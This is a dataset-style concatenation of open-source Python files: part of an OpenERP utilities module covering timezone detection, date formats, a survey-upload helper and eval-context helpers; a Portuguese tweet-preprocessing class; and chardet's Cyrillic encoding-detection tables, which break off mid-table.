            registry = _winreg.ConnectRegistry(None, _winreg.HKEY_LOCAL_MACHINE)
            tz_key = _winreg.OpenKey(registry, r"SYSTEM\CurrentControlSet\Control\TimeZoneInformation", 0, _winreg.KEY_ALL_ACCESS)
            # QueryValueEx returns (value, type code); keep the value only.
            result = str(_winreg.QueryValueEx(tz_key, "StandardName")[0])
            _winreg.CloseKey(tz_key)
            _winreg.CloseKey(registry)
        except Exception:
            # Best-effort: any registry failure just yields False.
            pass
    return result
def detect_server_timezone():
    """Attempt to detect the timezone to use on the server side.
    Defaults to UTC if no working timezone can be found.
    @return the timezone identifier as expected by pytz.timezone.
    """
    try:
        import pytz
    except Exception:
        _logger.warning("Python pytz module is not available. "
            "Timezone will be set to UTC by default.")
        return 'UTC'
    # Candidate sources are probed in order; the first one pytz accepts wins.
    # Option 1: the configuration option (did not exist before, so no backwards compatibility issue)
    # Option 2: to be backwards compatible with 5.0 or earlier, the value from time.tzname[0], but only if it is known to pytz
    # Option 3: the environment variable TZ
    sources = [ (config['timezone'], 'OpenERP configuration'),
                (time.tzname[0], 'time.tzname'),
                (os.environ.get('TZ',False),'TZ environment variable'), ]
    # Option 4: OS-specific: /etc/timezone on Unix
    if (os.path.exists("/etc/timezone")):
        tz_value = False
        try:
            f = open("/etc/timezone")
            tz_value = f.read(128).strip()
        except Exception:
            # NOTE(review): if open() itself raised, `f` is unbound and the
            # close() in the finally clause raises NameError.
            pass
        finally:
            f.close()
        sources.append((tz_value,"/etc/timezone file"))
    # Option 5: timezone info from registry on Win32
    if (sys.platform == "win32"):
        # Timezone info is stored in windows registry.
        # However this is not likely to work very well as the standard name
        # of timezones in windows is rarely something that is known to pytz.
        # But that's ok, it is always possible to use a config option to set
        # it explicitly.
        sources.append((get_win32_timezone(),"Windows Registry"))
    for (value,source) in sources:
        if value:
            try:
                tz = pytz.timezone(value)
                _logger.info("Using timezone %s obtained from %s.", tz.zone, source)
                return value
            except pytz.UnknownTimeZoneError:
                _logger.warning("The timezone specified in %s (%s) is invalid, ignoring it.", source, value)
    _logger.warning("No valid timezone could be detected, using default UTC "
        "timezone. You can specify it explicitly with option 'timezone' in "
        "the server configuration.")
    return 'UTC'
def get_server_timezone():
    """The server stores and exchanges all timestamps in UTC."""
    return "UTC"
# Canonical formats used whenever a date/time value crosses the RPC boundary
# or is stored in the database (see the timezone rationale comment above).
DEFAULT_SERVER_DATE_FORMAT = "%Y-%m-%d"
DEFAULT_SERVER_TIME_FORMAT = "%H:%M:%S"
DEFAULT_SERVER_DATETIME_FORMAT = "%s %s" % (
    DEFAULT_SERVER_DATE_FORMAT,
    DEFAULT_SERVER_TIME_FORMAT)
# Python's strftime supports only the format directives
# that are available on the platform's libc, so in order to
# be cross-platform we map to the directives required by
# the C standard (1989 version), always available on platforms
# with a C standard implementation.
DATETIME_FORMATS_MAP = {
        '%C': '', # century
        '%D': '%d/%m/%Y', # modified %y->%Y
        '%e': '%d',
        '%E': '', # special modifier
        '%F': '%Y-%m-%d',
        '%g': '%Y', # modified %y->%Y
        '%G': '%Y',
        '%h': '%b',
        '%k': '%H',
        '%l': '%I',
        '%n': '\n',
        '%O': '', # special modifier
        '%P': '%p',
        '%R': '%H:%M',
        '%r': '%I:%M:%S %p',
        '%s': '', #num of seconds since epoch
        '%T': '%H:%M:%S',
        '%t': ' ', # tab
        '%u': ' %w',
        '%V': '%W',
        '%y': '%Y', # Even if %y works, it's ambiguous, so we should use %Y
        '%+': '%Y-%m-%d %H:%M:%S',
        # %Z is a special case that causes 2 problems at least:
        #  - the timezone names we use (in res_user.context_tz) come
        #    from pytz, but not all these names are recognized by
        #    strptime(), so we cannot convert in both directions
        #    when such a timezone is selected and %Z is in the format
        #  - %Z is replaced by an empty string in strftime() when
        #    there is not tzinfo in a datetime value (e.g when the user
        #    did not pick a context_tz). The resulting string does not
        #    parse back if the format requires %Z.
        # As a consequence, we strip it completely from format strings.
        # The user can always have a look at the context_tz in
        # preferences to check the timezone.
        '%z': '',
        '%Z': '',
}
def server_to_local_timestamp(src_tstamp_str, src_format, dst_format, dst_tz_name,
        tz_offset=True, ignore_unparsable_time=True):
    """
    Convert a source timestamp string into a destination timestamp string, attempting to apply the
    correct offset if both the server and local timezone are recognized, or no
    offset at all if they aren't or if tz_offset is false (i.e. assuming they are both in the same TZ).
    WARNING: This method is here to allow formatting dates correctly for inclusion in strings where
             the client would not be able to format/offset it correctly. DO NOT use it for returning
             date fields directly, these are supposed to be handled by the client!!
    @param src_tstamp_str: the str value containing the timestamp in the server timezone.
    @param src_format: the format to use when parsing the server timestamp.
    @param dst_format: the format to use when formatting the resulting timestamp for the local/client timezone.
    @param dst_tz_name: name of the destination timezone (such as the 'tz' value of the client context)
    @param ignore_unparsable_time: if True, return False if src_tstamp_str cannot be parsed
                                   using src_format or formatted using dst_format.
    @return local/client formatted timestamp, expressed in the local/client timezone if possible
            and if tz_offset is true, or src_tstamp_str if timezone offset could not be determined.
    """
    if not src_tstamp_str:
        return False
    res = src_tstamp_str
    if src_format and dst_format:
        # find out server timezone
        server_tz = get_server_timezone()
        try:
            # dt_value needs to be a datetime.datetime object (so no time.struct_time or mx.DateTime.DateTime here!)
            dt_value = datetime.strptime(src_tstamp_str, src_format)
            if tz_offset and dst_tz_name:
                try:
                    import pytz
                    src_tz = pytz.timezone(server_tz)
                    dst_tz = pytz.timezone(dst_tz_name)
                    src_dt = src_tz.localize(dt_value, is_dst=True)
                    dt_value = src_dt.astimezone(dst_tz)
                except Exception:
                    # Deliberate best-effort: unknown timezone or missing
                    # pytz keeps the unconverted value.
                    pass
            res = dt_value.strftime(dst_format)
        except Exception:
            # Normal ways to end up here are if strptime or strftime failed
            if not ignore_unparsable_time:
                return False
    return res
def split_every(n, iterable, piece_maker=tuple):
    """Splits an iterable into length-n pieces. The last piece will be shorter
    if ``n`` does not evenly divide the iterable length.
    @param ``piece_maker``: function to build the pieces
    from the slices (tuple,list,...)
    """
    source = iter(iterable)
    while True:
        piece = piece_maker(islice(source, n))
        if not piece:
            # Exhausted (or piece_maker produced something falsy): stop.
            break
        yield piece
# When executed directly, run the doctests of the module.
# NOTE(review): this block sits in the middle of the file, so members defined
# *below* this point are not yet bound when testmod() runs as a script.
if __name__ == '__main__':
    import doctest
    doctest.testmod()
class upload_data_thread(threading.Thread):
    """Background thread that POSTs survey data to openerp.com.

    Failures are silently ignored (fire-and-forget). Uses the Python 2
    urllib API (urlencode/urlopen).
    """
    def __init__(self, email, data, type):
        # Field order matters for the encoded payload: email, type, data.
        self.args = [('email', email), ('type', type), ('data', data)]
        super(upload_data_thread, self).__init__()
    def run(self):
        try:
            import urllib
            encoded = urllib.urlencode(self.args)
            response = urllib.urlopen('http://www.openerp.com/scripts/survey.php', encoded)
            response.read()
            response.close()
        except Exception:
            pass
def upload_data(email, data, type='SURVEY'):
    """Start a background upload of ``data`` to openerp.com; returns True
    immediately without waiting for the upload to finish."""
    worker = upload_data_thread(email, data, type)
    worker.start()
    return True
def get_and_group_by_field(cr, uid, obj, ids, field, context=None):
    """Read ``field`` for the given ``ids`` and group the ids by its value.

    :param string field: name of the field we want to read and group by
    :return: mapping of field values to the list of ids that have it
             (many2one tuple values contribute their id, i.e. element 0)
    :rtype: dict
    """
    grouped = {}
    for record in obj.read(cr, uid, ids, [field], context=context):
        value = record[field]
        if isinstance(value, tuple):
            value = value[0]
        grouped.setdefault(value, []).append(record['id'])
    return grouped
def get_and_group_by_company(cr, uid, obj, ids, context=None):
    """Group ``ids`` of ``obj`` by the value of their company_id field."""
    return get_and_group_by_field(cr, uid, obj, ids, field='company_id', context=context)
# port of python 2.6's attrgetter with support for dotted notation
def resolve_attr(obj, attr):
    """Follow the dotted attribute path ``attr`` starting from ``obj``.

    resolve_attr(x, "a.b") is getattr(getattr(x, "a"), "b").
    """
    target = obj
    for part in attr.split("."):
        target = getattr(target, part)
    return target
def attrgetter(*items):
    """Port of Python 2.6's operator.attrgetter with dotted-name support.

    With one item the getter returns a single value; with several items it
    returns a tuple of values, in order.
    """
    if len(items) == 1:
        single = items[0]
        def g(obj):
            return resolve_attr(obj, single)
        return g
    def g(obj):
        return tuple(resolve_attr(obj, attr) for attr in items)
    return g
class unquote(str):
    """A str subclass whose repr() is the bare string itself — no quotes,
    no escaping. The name comes from Lisp's unquote.

    One use is to preserve or insert bare variable names within dicts
    during eval() of a dict's repr(). Use with care.
    Examples (note that ``active_id`` is never surrounded by quotes):
    >>> unquote('active_id')
    active_id
    >>> d = {'test': unquote('active_id')}
    >>> d
    {'test': active_id}
    """
    def __repr__(self):
        # The repr *is* the original string, untouched.
        return self
class UnquoteEvalContext(defaultdict):
    """Defaultdict-based evaluation context returning an ``unquote`` string
    for any missing name used during the evaluation.

    Mostly useful for evaluating OpenERP domains/contexts that may refer to
    names unknown at eval time, so that converting the context/domain back
    to a string preserves the original names.
    **Warning**: using an ``UnquoteEvalContext`` as context for ``eval()`` or
    ``safe_eval()`` will shadow the builtins, which may cause other failures,
    depending on what is evaluated.
    Example (note that ``section_id`` is preserved in the final result):
    >>> context_str = "{'default_user_id': uid, 'default_section_id': section_id}"
    >>> eval(context_str, UnquoteEvalContext(uid=1))
    {'default_user_id': 1, 'default_section_id': section_id}
    """
    def __init__(self, *args, **kwargs):
        # default_factory is None: missing keys go through __missing__ below.
        super(UnquoteEvalContext, self).__init__(None, *args, **kwargs)
    def __missing__(self, key):
        return unquote(key)
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
| agpl-3.0 |
fernandopso/twitter-svm-tfidf.py | app/trainer/processing.py | 2 | 3938 | # !/usr/bin/env python
# -*- coding: utf-8 -*-
import Stemmer
import pt_br_mapper as constants
class Processing(object):
    """Normalization pipeline that reduces ambiguities in a raw tweet.

    All methods make more sense for the Portuguese-BR language: the
    substitution tables come from the ``pt_br_mapper`` module (imported
    as ``constants`` at the top of this file).
    """
    def __init__(self, tweet):
        # Text being normalized; every step rewrites it in place.
        self.tweet = tweet

    def execute(self):
        """Run every normalization step, in order, and return the result."""
        self.lower_case()
        self.accented_letters()
        self.double_letters()
        self.special_characters()
        self.similar_words()
        self.remove_mentions()
        self.remove_links()
        self.remove_solitary_letters()
        return self.tweet

    def lower_case(self):
        """Fold the whole tweet to lower case."""
        self.tweet = self.tweet.lower()
        return self.tweet

    def accented_letters(self):
        """Replace every accented letter with its unaccented equivalent."""
        for accented, plain in constants.UNICODE_ACCENTED_LETTERS.items():
            self.tweet = self.tweet.replace(accented, plain)
        return self.tweet

    def double_letters(self):
        """Collapse doubled letters that are common typos.

        The pairs rr, ss and oo are deliberately not in the mapping, as
        they are legitimate in Portuguese-BR tweets.
        """
        # Replace repeatedly until no occurrence is left, so longer runs
        # ("aaaa") are fully collapsed. BUGFIX: the previous implementation
        # re-tested the rewritten tweet against a word list computed from
        # the *original* tweet, which could spin forever when the tweet
        # still contained a key that no stale word matched.
        for doubled, single in constants.DOUBLE_LETTERS.items():
            while doubled in self.tweet:
                self.tweet = self.tweet.replace(doubled, single)
        return self.tweet

    def special_characters(self):
        """Replace characters that make no sense to a human reader."""
        for char, replacement in constants.SPECIAL_CHARACTERS.items():
            self.tweet = self.tweet.replace(char, replacement)
        return self.tweet

    def similar_words(self):
        """Expand words written the way they are pronounced, or written
        using analogies with other small words."""
        # Iterate over the words of the tweet as it was when this step
        # started; each match rewrites the tweet via near().
        for word in self.tweet.split():
            if word in constants.SIMILAR_WORDS:
                self.tweet = self.near(self.tweet, word, constants.SIMILAR_WORDS[word])
        return self.tweet

    def remove_mentions(self):
        """Strip every word containing an @mention."""
        if self.tweet.find('@') != -1:
            self.tweet = self.remove(self.tweet, '@')
        return self.tweet

    def remove_links(self):
        """Strip every word containing an http(s) link."""
        if self.tweet.find('http') != -1:
            self.tweet = self.remove(self.tweet, 'http')
        return self.tweet

    def remove_solitary_letters(self):
        """Drop the one-letter words listed in constants.SOLITARY_LETTERS."""
        for letter in constants.SOLITARY_LETTERS:
            self.tweet = self.near(self.tweet, letter, '')
        return self.tweet

    def remove_word(self, tweet, stopword):
        """Return ``tweet`` with every word equal to ``stopword`` removed.

        Keeps the historical contract: returns None when ``tweet`` is None,
        and the rebuilt text carries a trailing space.
        """
        # `is not None` replaces the former `!= None` equality test.
        if tweet is None:
            return None
        kept = ''
        for word in tweet.split():
            if word != stopword:
                kept += word + ' '
        return kept

    def remove(self, tweet, key):
        """Return ``tweet`` without any word that *contains* ``key``."""
        kept = ''
        for word in tweet.split():
            if word.find(key) == -1:
                kept += word + ' '
        return kept

    def near(self, tweet, key, value):
        """Return ``tweet`` with every word *equal* to ``key`` replaced by
        ``value`` (the rebuilt text carries a trailing space)."""
        rebuilt = ''
        for word in tweet.split():
            if word == key:
                rebuilt += value + ' '
            else:
                rebuilt += word + ' '
        return rebuilt
| mit |
rembo10/headphones | lib/requests/packages/chardet/langcyrillicmodel.py | 2762 | 17725 | ######################## BEGIN LICENSE BLOCK ########################
# The Original Code is Mozilla Communicator client code.
#
# The Initial Developer of the Original Code is
# Netscape Communications Corporation.
# Portions created by the Initial Developer are Copyright (C) 1998
# the Initial Developer. All Rights Reserved.
#
# Contributor(s):
# Mark Pilgrim - port to Python
#
# This library is free software; you can redistribute it and/or
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation; either
# version 2.1 of the License, or (at your option) any later version.
#
# This library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this library; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA
# 02110-1301 USA
######################### END LICENSE BLOCK #########################
# KOI8-R language model
# Character Mapping Table:
KOI8R_CharToOrderMap = (
255,255,255,255,255,255,255,255,255,255,254,255,255,254,255,255, # 00
255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255, # 10
253,253,253,253,253,253,253,253,253,253,253,253,253,253,253,253, # 20
252,252,252,252,252,252,252,252,252,252,253,253,253,253,253,253, # 30
253,142,143,144,145,146,147,148,149,150,151,152, 74,153, 75,154, # 40
155,156,157,158,159,160,161,162,163,164,165,253,253,253,253,253, # 50
253, 71,172, 66,173, 65,174, 76,175, 64,176,177, 77, 72,178, 69, # 60
67,179, 78, 73,180,181, 79,182,183,184,185,253,253,253,253,253, # 70
191,192,193,194,195,196,197,198,199,200,201,202,203,204,205,206, # 80
207,208,209,210,211,212,213,214,215,216,217,218,219,220,221,222, # 90
223,224,225, 68,226,227,228,229,230,231,232,233,234,235,236,237, # a0
238,239,240,241,242,243,244,245,246,247,248,249,250,251,252,253, # b0
27, 3, 21, 28, 13, 2, 39, 19, 26, 4, 23, 11, 8, 12, 5, 1, # c0
15, 16, 9, 7, 6, 14, 24, 10, 17, 18, 20, 25, 30, 29, 22, 54, # d0
59, 37, 44, 58, 41, 48, 53, 46, 55, 42, 60, 36, 49, 38, 31, 34, # e0
35, 43, 45, 32, 40, 52, 56, 33, 61, 62, 51, 57, 47, 63, 50, 70, # f0
)
win1251_CharToOrderMap = (
255,255,255,255,255,255,255,255,255,255,254,255,255,254,255,255, # 00
255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255, # 10
253,253,253,253,253,253,253,253,253,253,253,253,253,253,253,253, # 20
252,252,252,252,252,252,252,252,252,252,253,253,253,253,253,253, # 30
253,142,143,144,145,146,147,148,149,150,151,152, 74,153, 75,154, # 40
155,156,157,158,159,160,161,162,163,164,165,253,253,253,253,253, # 50
253, 71,172, 66,173, 65,174, 76,175, 64,176,177, 77, 72,178, 69, # 60
67,179, 78, 73,180,181, 79,182,183,184,185,253,253,253,253,253, # 70
191,192,193,194,195,196,197,198,199,200,201,202,203,204,205,206,
207,208,209,210,211,212,213,214,215,216,217,218,219,220,221,222,
223,224,225,226,227,228,229,230,231,232,233,234,235,236,237,238,
239,240,241,242,243,244,245,246, 68,247,248,249,250,251,252,253,
37, 44, 33, 46, 41, 48, 56, 51, 42, 60, 36, 49, 38, 31, 34, 35,
45, 32, 40, 52, 53, 55, 58, 50, 57, 63, 70, 62, 61, 47, 59, 43,
3, 21, 10, 19, 13, 2, 24, 20, 4, 23, 11, 8, 12, 5, 1, 15,
9, 7, 6, 14, 39, 26, 28, 22, 25, 29, 54, 18, 17, 30, 27, 16,
)
latin5_CharToOrderMap = (
255,255,255,255,255,255,255,255,255,255,254,255,255,254,255,255, # 00
255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255, # 10
253,253,253,253,253,253,253,253,253,253,253,253,253,253,253,253, # 20
252,252,252,252,252,252,252,252,252,252,253,253,253,253,253,253, # 30
253,142,143,144,145,146,147,148,149,150,151,152, 74,153, 75,154, # 40
155,156,157,158,159,160,161,162,163,164,165,253,253,253,253,253, # 50
253, 71,172, 66,173, 65,174, 76,175, 64,176,177, 77, 72,178, 69, # 60
67,179, 78, 73,180,181, 79,182,183,184,185,253,253,253,253,253, # 70
191,192,193,194,195,196,197,198,199,200,201,202,203,204,205,206,
207,208,209,210,211,212,213,214,215,216,217,218,219,220,221,222,
223,224,225,226,227,228,229,230,231,232,233,234,235,236,237,238,
37, 44, 33, 46, 41, 48, 56, 51, 42, 60, 36, 49, 38, 31, 34, 35,
45, 32, 40, 52, 53, 55, 58, 50, 57, 63, 70, 62, 61, 47, 59, 43,
3, 21, 10, 19, 13, 2, 24, 20, 4, 23, 11, 8, 12, 5, 1, 15,
9, 7, 6, 14, 39, 26, 28, 22, 25, 29, 54, 18, 17, 30, 27, 16,
239, 68,240,241,242,243,244,245,246,247,248,249,250,251,252,255,
)
macCyrillic_CharToOrderMap = (
255,255,255,255,255,255,255,255,255,255,254,255,255,254,255,255, # 00
255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255, # 10
253,253,253,253,253,253,253,253,253,253,253,253,253,253,253,253, # 20
252,252,252,252,252,252,252,252,252,252,253,253,253,253,253,253, # 30
253,142,143,144,145,146,147,148,149,150,151,152, 74,153, 75,154, # 40
155,156,157,158,159,160,161,162,163,164,165,253,253,253,253,253, # 50
253, 71,172, 66,173, 65,174, 76,175, 64,176,177, 77, 72,178, 69, # 60
67,179, 78, 73,180,181, 79,182,183,184,185,253,253,253,253,253, # 70
37, 44, 33, 46, 41, 48, 56, 51, 42, 60, 36, 49, 38, 31, 34, 35,
45, 32, 40, 52, 53, 55, 58, 50, 57, 63, 70, 62, 61, 47, 59, 43,
191,192,193,194,195,196,197,198,199,200,201,202,203,204,205,206,
207,208,209,210,211,212,213,214,215,216,217,218,219,220,221,222,
223,224,225,226,227,228,229,230,231,232,233,234,235,236,237,238,
239,240,241,242,243,244,245,246,247,248,249,250,251,252, 68, 16,
3, 21, 10, 19, 13, 2, 24, 20, 4, 23, 11, 8, 12, 5, 1, 15,
9, 7, 6, 14, 39, 26, 28, 22, 25, 29, 54, 18, 17, 30, 27,255,
)
IBM855_CharToOrderMap = (
255,255,255,255,255,255,255,255,255,255,254,255,255,254,255,255, # 00
255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255, # 10
253,253,253,253,253,253,253,253,253,253,253,253,253,253,253,253, # 20
252,252,252,252,252,252,252,252,252,252,253,253,253,253,253,253, # 30
253,142,143,144,145,146,147,148,149,150,151,152, 74,153, 75,154, # 40
155,156,157,158,159,160,161,162,163,164,165,253,253,253,253,253, # 50
253, 71,172, 66,173, 65,174, 76,175, 64,176,177, 77, 72,178, 69, # 60
67,179, 78, 73,180,181, 79,182,183,184,185,253,253,253,253,253, # 70
191,192,193,194, 68,195,196,197,198,199,200,201,202,203,204,205,
206,207,208,209,210,211,212,213,214,215,216,217, 27, 59, 54, 70,
3, 37, 21, 44, 28, 58, 13, 41, 2, 48, 39, 53, 19, 46,218,219,
220,221,222,223,224, 26, 55, 4, 42,225,226,227,228, 23, 60,229,
230,231,232,233,234,235, 11, 36,236,237,238,239,240,241,242,243,
8, 49, 12, 38, 5, 31, 1, 34, 15,244,245,246,247, 35, 16,248,
43, 9, 45, 7, 32, 6, 40, 14, 52, 24, 56, 10, 33, 17, 61,249,
250, 18, 62, 20, 51, 25, 57, 30, 47, 29, 63, 22, 50,251,252,255,
)
IBM866_CharToOrderMap = (
255,255,255,255,255,255,255,255,255,255,254,255,255,254,255,255, # 00
255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255, # 10
253,253,253,253,253,253,253,253,253,253,253,253,253,253,253,253, # 20
252,252,252,252,252,252,252,252,252,252,253,253,253,253,253,253, # 30
253,142,143,144,145,146,147,148,149,150,151,152, 74,153, 75,154, # 40
155,156,157,158,159,160,161,162,163,164,165,253,253,253,253,253, # 50
253, 71,172, 66,173, 65,174, 76,175, 64,176,177, 77, 72,178, 69, # 60
67,179, 78, 73,180,181, 79,182,183,184,185,253,253,253,253,253, # 70
37, 44, 33, 46, 41, 48, 56, 51, 42, 60, 36, 49, 38, 31, 34, 35,
45, 32, 40, 52, 53, 55, 58, 50, 57, 63, 70, 62, 61, 47, 59, 43,
3, 21, 10, 19, 13, 2, 24, 20, 4, 23, 11, 8, 12, 5, 1, 15,
191,192,193,194,195,196,197,198,199,200,201,202,203,204,205,206,
207,208,209,210,211,212,213,214,215,216,217,218,219,220,221,222,
223,224,225,226,227,228,229,230,231,232,233,234,235,236,237,238,
9, 7, 6, 14, 39, 26, 28, 22, 25, 29, 54, 18, 17, 30, 27, 16,
239, 68,240,241,242,243,244,245,246,247,248,249,250,251,252,255,
)
# Model Table:
# total sequences: 100%
# first 512 sequences: 97.6601%
# first 1024 sequences: 2.3389%
# rest sequences: 0.1237%
# negative sequences: 0.0009%
RussianLangModel = (
0,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,1,1,3,3,3,3,1,3,3,3,2,3,2,3,3,
3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,0,3,2,2,2,2,2,0,0,2,
3,3,3,2,3,3,3,3,3,3,3,3,3,3,2,3,3,0,0,3,3,3,3,3,3,3,3,3,2,3,2,0,
0,0,0,0,0,0,0,2,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
3,3,3,2,2,3,3,3,3,3,3,3,3,3,2,3,3,0,0,3,3,3,3,3,3,3,3,2,3,3,1,0,
0,0,0,0,0,0,0,2,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
3,2,3,2,3,3,3,3,3,3,3,3,3,3,3,3,3,0,0,3,3,3,3,3,3,3,3,3,3,3,2,1,
0,0,0,0,0,0,0,2,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
3,3,3,3,3,3,3,3,3,3,3,3,3,3,2,3,3,0,0,3,3,3,3,3,3,3,3,3,3,3,2,1,
0,0,0,0,0,1,0,2,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
3,3,3,3,3,3,3,3,2,2,2,3,1,3,3,1,3,3,3,3,2,2,3,0,2,2,2,3,3,2,1,0,
0,0,0,0,0,0,0,2,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,
3,3,3,3,3,3,2,3,3,3,3,3,2,2,3,2,3,3,3,2,1,2,2,0,1,2,2,2,2,2,2,0,
0,0,0,0,0,0,0,2,0,0,0,0,0,0,0,0,0,0,0,0,0,0,2,0,0,0,0,0,0,0,0,0,
3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,2,2,2,3,0,2,2,3,3,2,1,2,0,
0,0,0,0,0,0,0,2,0,0,0,0,0,0,0,0,0,0,0,1,0,0,2,0,0,0,0,0,0,0,0,0,
3,3,3,3,3,3,2,3,3,1,2,3,2,2,3,2,3,3,3,3,2,2,3,0,3,2,2,3,1,1,1,0,
0,0,0,0,0,0,0,2,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
3,3,3,3,3,3,3,3,2,2,3,3,3,3,3,2,3,3,3,3,2,2,2,0,3,3,3,2,2,2,2,0,
0,0,0,0,0,0,0,2,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
3,3,3,3,3,3,3,3,3,3,2,3,2,3,3,3,3,3,3,2,3,2,2,0,1,3,2,1,2,2,1,0,
0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,2,0,0,0,0,0,0,0,0,0,
3,3,3,3,3,3,3,3,3,3,3,2,1,1,3,0,1,1,1,1,2,1,1,0,2,2,2,1,2,0,1,0,
0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
3,3,3,3,3,3,2,3,3,2,2,2,2,1,3,2,3,2,3,2,1,2,2,0,1,1,2,1,2,1,2,0,
0,0,0,0,0,0,0,2,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
3,3,3,3,3,3,3,3,3,3,3,3,2,2,3,2,3,3,3,2,2,2,2,0,2,2,2,2,3,1,1,0,
0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,2,0,0,0,0,0,0,0,0,0,
3,2,3,2,2,3,3,3,3,3,3,3,3,3,1,3,2,0,0,3,3,3,3,2,3,3,3,3,2,3,2,0,
0,0,0,0,0,0,0,2,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
2,3,3,3,3,3,2,2,3,3,0,2,1,0,3,2,3,2,3,0,0,1,2,0,0,1,0,1,2,1,1,0,
0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
3,0,3,0,2,3,3,3,3,2,3,3,3,3,1,2,2,0,0,2,3,2,2,2,3,2,3,2,2,3,0,0,
0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
3,2,3,0,2,3,2,3,0,1,2,3,3,2,0,2,3,0,0,2,3,2,2,0,1,3,1,3,2,2,1,0,
0,0,0,0,0,0,0,2,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
3,1,3,0,2,3,3,3,3,3,3,3,3,2,1,3,2,0,0,2,2,3,3,3,2,3,3,0,2,2,0,0,
0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
3,3,3,3,3,3,2,2,3,3,2,2,2,3,3,0,0,1,1,1,1,1,2,0,0,1,1,1,1,0,1,0,
0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
3,3,3,3,3,3,2,2,3,3,3,3,3,3,3,0,3,2,3,3,2,3,2,0,2,1,0,1,1,0,1,0,
0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,2,0,0,0,0,0,0,0,0,0,
3,3,3,3,3,3,2,3,3,3,2,2,2,2,3,1,3,2,3,1,1,2,1,0,2,2,2,2,1,3,1,0,
0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,2,0,0,0,0,0,0,0,0,0,
2,2,3,3,3,3,3,1,2,2,1,3,1,0,3,0,0,3,0,0,0,1,1,0,1,2,1,0,0,0,0,0,
0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
3,2,2,1,1,3,3,3,2,2,1,2,2,3,1,1,2,0,0,2,2,1,3,0,0,2,1,1,2,1,1,0,
0,0,0,0,0,0,0,2,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
3,2,3,3,3,3,1,2,2,2,1,2,1,3,3,1,1,2,1,2,1,2,2,0,2,0,0,1,1,0,1,0,
0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
2,3,3,3,3,3,2,1,3,2,2,3,2,0,3,2,0,3,0,1,0,1,1,0,0,1,1,1,1,0,1,0,
0,0,0,0,0,0,0,2,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
3,3,2,3,3,3,2,2,2,3,3,1,2,1,2,1,0,1,0,1,1,0,1,0,0,2,1,1,1,0,1,0,
0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,
3,1,1,2,1,2,3,3,2,2,1,2,2,3,0,2,1,0,0,2,2,3,2,1,2,2,2,2,2,3,1,0,
0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
3,3,3,3,3,1,1,0,1,1,2,2,1,1,3,0,0,1,3,1,1,1,0,0,0,1,0,1,1,0,0,0,
0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
2,1,3,3,3,2,0,0,0,2,1,0,1,0,2,0,0,2,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
2,0,1,0,0,2,3,2,2,2,1,2,2,2,1,2,1,0,0,1,1,1,0,2,0,1,1,1,0,0,1,1,
1,0,0,0,0,0,1,2,0,0,0,0,0,1,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,
